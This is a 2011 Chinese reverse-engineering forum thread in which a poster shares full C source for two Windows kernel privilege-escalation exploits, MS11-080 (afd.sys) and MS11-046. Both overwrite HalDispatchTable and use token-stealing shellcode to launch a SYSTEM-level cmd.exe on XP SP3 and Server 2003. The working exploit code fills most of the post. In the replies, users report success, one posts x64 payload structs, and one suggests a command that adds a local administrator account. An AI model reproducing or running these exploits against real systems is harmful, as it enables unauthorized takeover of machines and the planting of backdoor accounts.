首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 软件逆向
    3. 发新帖
[讨论]MS11-080、MS11-046两个提权代码
发表于: 2011-12-1 20:09 26310

[讨论]MS11-080、MS11-046两个提权代码

KiDebug 活跃值
4
2011-12-1 20:09
26310
拿着大牛写的代码自己弹CMD玩,多多包涵。。
/*
 * MS11-080 Afd.sys Privilege Escalation Exploit
 * 来源:Matteo Memelli,b8aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8X3g2^5M7r3I4G2K9i4c8K6i4K6u0r3x3e0R3I4y4K6k6Q4x3V1j5`.
 * 改编:KiDebug,Google@pku.edu.cn
 * 编译:VC6.0
 * 测试环境:原版Windows XP SP3,Windows 2003 SP2,普通用户
 */
#include <stdio.h>
#include <Winsock2.h>
#include <windows.h>
#pragma comment (lib, "ws2_32.lib")

typedef struct _RTL_PROCESS_MODULE_INFORMATION {
	HANDLE Section;                 // Not filled in
	PVOID MappedBase;
	PVOID ImageBase;
	ULONG ImageSize;
	ULONG Flags;
	USHORT LoadOrderIndex;
	USHORT InitOrderIndex;
	USHORT LoadCount;
	USHORT OffsetToFileName;
	UCHAR  FullPathName[ 256 ];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;

typedef struct _RTL_PROCESS_MODULES {
	ULONG NumberOfModules;
	RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;

typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
NtQueryIntervalProfile_	NtQueryIntervalProfile;
NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
NtQuerySystemInformation_ NtQuerySystemInformation;

ULONG    PsInitialSystemProcess, PsReferencePrimaryToken, PsGetThreadProcess, WriteToHalDispatchTable;

void _declspec(naked) ShellCode()
{
	__asm
	{
		pushad
		pushfd
		mov esi,PsReferencePrimaryToken
FindTokenOffset:
		lodsb
		cmp al, 8Dh;
		jnz FindTokenOffset
		mov edi,[esi+1]
		mov esi,PsInitialSystemProcess
		mov esi,[esi]
		push fs:[124h]
		mov eax,PsGetThreadProcess
		call eax
		add esi, edi
		add edi, eax
		movsd
		popfd
		popad
		ret
	}
}



void main( )
{
	HMODULE	ntdll				=	GetModuleHandle( "ntdll.dll" );
	NtQueryIntervalProfile		=	(NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
	NtAllocateVirtualMemory		=	(NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
	NtQuerySystemInformation	=	( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );
	if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )
		return;

	ULONG    BaseAddress = 1 , RegionSize = 0x1000, status;
	status = NtAllocateVirtualMemory( (HANDLE)0xFFFFFFFF, (PVOID*)&BaseAddress, 0, &RegionSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE );
	if ( status )
		return;

	//取ntoskrnl的信息,只要调用一次就行
	ULONG	NtoskrnlBase;
	RTL_PROCESS_MODULES	module;
	status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
	if ( status != 0xC0000004 )    //STATUS_INFO_LENGTH_MISMATCH
		return;

	NtoskrnlBase   	=	(ULONG)module.Modules[0].ImageBase;

	//把ntoskrnl.exe加载进来
	HMODULE		ntoskrnl;
	ntoskrnl    =    LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
	if ( ntoskrnl == NULL )
		return;

	//计算实际地址
	WriteToHalDispatchTable		=	(ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4 + 2; //需要覆盖的地址
	PsInitialSystemProcess		=	(ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
	PsReferencePrimaryToken		=	(ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase;
	PsGetThreadProcess			=	(ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
	
	//以下代码就各显神通了
	if ( VirtualAlloc( (PVOID)0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) == NULL )
		return;

	memset((PVOID)0x02070000,0x90,0x20000);
	memcpy((PVOID)0x02080000,ShellCode,100);


	WSADATA ws;

	SOCKET tcp_socket;
	struct sockaddr_in peer;
	ULONG  dwReturnSize;

	WSAStartup(0x0202,&ws);

	peer.sin_family = AF_INET;
	peer.sin_port = htons(4455);
	peer.sin_addr.s_addr = inet_addr( "127.0.0.1" );

	tcp_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

	if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(struct sockaddr_in)) )
	{
		printf("connect error\n");
	}

	UCHAR	buf1[26]= "\x41\x41\x41\x41\x42\x42\x42\x42\x00\x00\x00\x00\x44\x44\x44\x44\x01\x00\x00\x00\xe8\x00\x34\xf0\x00";
	memset((PVOID)0x1000,0x45,0x108);
	memcpy((PVOID)0x1000,buf1,25);
	
	if(!DeviceIoControl((HANDLE)tcp_socket,0x000120bb, (PVOID)0x1004, 0x108, (PVOID)WriteToHalDispatchTable, 0x0,&dwReturnSize, NULL))
	{
		printf("error=%d\n", GetLastError());
	}

	//触发,弹出SYSTEM的CMD
	NtQueryIntervalProfile( 2, &status );
	ShellExecute( NULL, "open", "cmd.exe", NULL, NULL, SW_SHOW);
	return;
}



/*
 * 触发MS11-046
 * 来源:azy,0a5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3S2A6i4K6u0W2j5X3q4A6k6s2g2Q4x3X3g2U0L8$3#2Q4x3V1k6S2P5Y4V1H3z5e0t1J5i4K6u0r3j5X3I4G2k6#2)9J5c8X3W2@1k6h3#2Q4x3V1j5H3y4e0x3H3y4U0g2V1x3e0V1%4j5$3g2T1k6X3y4S2y4e0M7J5j5K6R3@1z5e0u0Q4x3X3g2Z5N6r3#2D9
 * 改编:KiDebug,Google@pku.edu.cn
 * 编译:VC6.0
 * 测试环境:原版Windows XP SP3,Windows 2003 SP2,普通用户
 */
#include <stdio.h>
#include <Winsock2.h>
#include <windows.h>
#pragma comment (lib, "ws2_32.lib")

typedef struct _RTL_PROCESS_MODULE_INFORMATION {
	HANDLE Section;                 // Not filled in
	PVOID MappedBase;
	PVOID ImageBase;
	ULONG ImageSize;
	ULONG Flags;
	USHORT LoadOrderIndex;
	USHORT InitOrderIndex;
	USHORT LoadCount;
	USHORT OffsetToFileName;
	UCHAR  FullPathName[ 256 ];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;

typedef struct _RTL_PROCESS_MODULES {
	ULONG NumberOfModules;
	RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;

typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
NtQueryIntervalProfile_	NtQueryIntervalProfile;
NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
NtQuerySystemInformation_ NtQuerySystemInformation;

ULONG    PsInitialSystemProcess, PsReferencePrimaryToken, PsGetThreadProcess, WriteToHalDispatchTable;

void _declspec(naked) ShellCode()
{
	__asm
	{
		pushad
		pushfd
		mov esi,PsReferencePrimaryToken
FindTokenOffset:
		lodsb
		cmp al, 8Dh;
		jnz FindTokenOffset
		mov edi,[esi+1]
		mov esi,PsInitialSystemProcess
		mov esi,[esi]
		push fs:[124h]
		mov eax,PsGetThreadProcess
		call eax
		add esi, edi
		add edi, eax
		movsd
		popfd
		popad
		ret
	}
}



void main( )
{
	HMODULE	ntdll				=	GetModuleHandle( "ntdll.dll" );
	NtQueryIntervalProfile		=	(NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
	NtAllocateVirtualMemory		=	(NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
	NtQuerySystemInformation	=	( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );
	if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )
		return;
	
	//取ntoskrnl的信息,只要调用一次就行
	ULONG	status, NtoskrnlBase;
	RTL_PROCESS_MODULES	module;
	status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
	if ( status != 0xC0000004 )    //STATUS_INFO_LENGTH_MISMATCH
		return;

	NtoskrnlBase   	=	(ULONG)module.Modules[0].ImageBase;

	//把ntoskrnl.exe加载进来
	HMODULE		ntoskrnl;
	ntoskrnl    =    LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
	if ( ntoskrnl == NULL )
		return;

	//计算实际地址
	WriteToHalDispatchTable		=	(ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4 + 2; //需要覆盖的地址
	PsInitialSystemProcess		=	(ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
	PsReferencePrimaryToken		=	(ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase;
	PsGetThreadProcess			=	(ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase;

	//以下代码就各显神通了
	if ( VirtualAlloc( (PVOID)0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) == NULL )
		return;
	
	memset((PVOID)0x02070000,0x90,0x20000);
	memcpy((PVOID)0x02080000,ShellCode,100);


	WSADATA ws;

	SOCKET tcp_socket;
	struct sockaddr_in peer;
	ULONG  dwReturnSize;

	WSAStartup(0x0202,&ws);

	peer.sin_family = AF_INET;
	peer.sin_port = htons(0);
	peer.sin_addr.s_addr = inet_addr( "127.0.0.1" );

	tcp_socket = socket(AF_INET, SOCK_STREAM, 0);

	if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(struct sockaddr_in)) )
	{
		printf("connect error\n");
	}


	DWORD buf[0x30];
	buf[3]=1;
	buf[4]=0x20;

	if(!DeviceIoControl((HANDLE)tcp_socket,0x12007, (PVOID)buf, 0x60, (PVOID)WriteToHalDispatchTable, 0x0,&dwReturnSize, NULL))
	{
		printf("error=%d\n", GetLastError());
	}

	//触发,弹出SYSTEM的CMD
	NtQueryIntervalProfile( 2, &status );
	ShellExecute( NULL, "open", "cmd.exe", NULL, NULL, SW_SHOW);
	return;
}

[培训]科锐逆向工程师培训第53期2025年7月8日开班!

收藏
免费 0
支持
分享
最新回复 (18)
coldairx
雪    币: 96
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
2
加多点注释该多好啊!
2011-12-1 20:27
0
狂起来
雪    币: 86
活跃值: (15)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
3
这两个啥漏洞
2011-12-1 21:04
0
zuoyefeng
雪    币: 237
活跃值: (15)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
4
顶KiDebug
2011-12-1 21:23
0
PEBOSS
雪    币: 33
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
5
都是提权啊

什么时候来个溢出的
2011-12-2 03:48
0
qhkest
雪    币: 201
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
6
ms11-080在webshell下无法使用。
2011-12-2 08:30
0
instruder
雪    币: 146
活跃值: (182)
能力值: ( LV13,RANK:220 )
在线值:
发帖
回帖
粉丝
私信
7
kidebug 肿么能这么**
2011-12-2 08:54
0
lhwqqq
雪    币: 47
活跃值: (86)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
8
哎  看来我和高手还差的很多很多啊
2011-12-2 09:31
0
peaceclub
雪    币: 255
活跃值: (207)
能力值: ( LV9,RANK:250 )
在线值:
发帖
回帖
粉丝
私信
9
typedef struct _evil32
{
ULONG u1;
ULONG un0;
ULONG u2;
ULONG un1;
WORD  w1;
WORD  w2;
BYTE  z1;
}evil32;

typedef struct _evil64
{
        ULONG u1a;
        ULONG u1b;
        ULONG un0;
        ULONG un1;
        WORD  w1;
        WORD  w2;
        BYTE  z1;
}evil64;

   evil32 e32;
  evil64 e64;
  e32.u1=0x41414141;
  e32.u2=0x42424242;
  e32.un0=0;
  e32.un1=1;
  e32.w1=0xe8;
  e32.w2=0x4444;
  e32.z1=0;

  e64.u1a=0x41414141;
  e64.u1b=tcp_socket;
  e64.un0=0;
  e64.un1=1;
  e64.w1=0xe8;
  e64.w2=0x4444;
  e64.z1=0;

x64貌似不好利用。
2011-12-3 21:33
0
longbbyl
雪    币: 1022
活跃值: (292)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
10
提权需要执行
2011-12-5 17:09
0
tyTYtyTYTY
雪    币: 81
活跃值: (40)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
11
支持!!!!!!!!!!!!!!!!!!!!
2011-12-5 20:37
0
haw
雪    币: 16
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
haw
12
怎样用啊,我在VC6里编译运行弹出DOD窗口提示error=998,什么情况啊?
2011-12-8 09:38
0
雅蠛蝶
雪    币: 28
活跃值: (25)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
私信
13
ShellExecute( NULL, "open", "cmd.exe", "/c net user xxxx /add && net localgroup administrators xxxx /add", NULL, SW_SHOW);
这样改一下也好~
2011-12-9 17:55
0
xss
雪    币: 472
活跃值: (4906)
能力值: ( LV9,RANK:170 )
在线值:
发帖
回帖
粉丝
私信
14
尝试了下,第一个编译成功弹出cmd黑框,任务管理器里面显示systeam用户权限进程
2011-12-11 11:42
0
拍拖
雪    币: 1790
活跃值: (4550)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
私信
15
第一个在我计算机上崩溃蓝屏 XP SP3
2011-12-14 15:17
0
wlksl
雪    币: 84
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
16
两个都成功了!!
2011-12-14 16:55
0
sillyer
雪    币: 243
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
17
有支持64位的么?
2012-5-23 14:36
0
choday
雪    币: 240
活跃值: (190)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
私信
18
sp3 直接蓝屏
2012-5-25 13:08
0
dswang
雪    币: 50
活跃值: (10)
能力值: ( LV2,RANK:15 )
在线值:
发帖
回帖
粉丝
私信
19
很厉害,能够有分析说明就好了~~~菜鸟飘过
2012-8-30 11:13
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回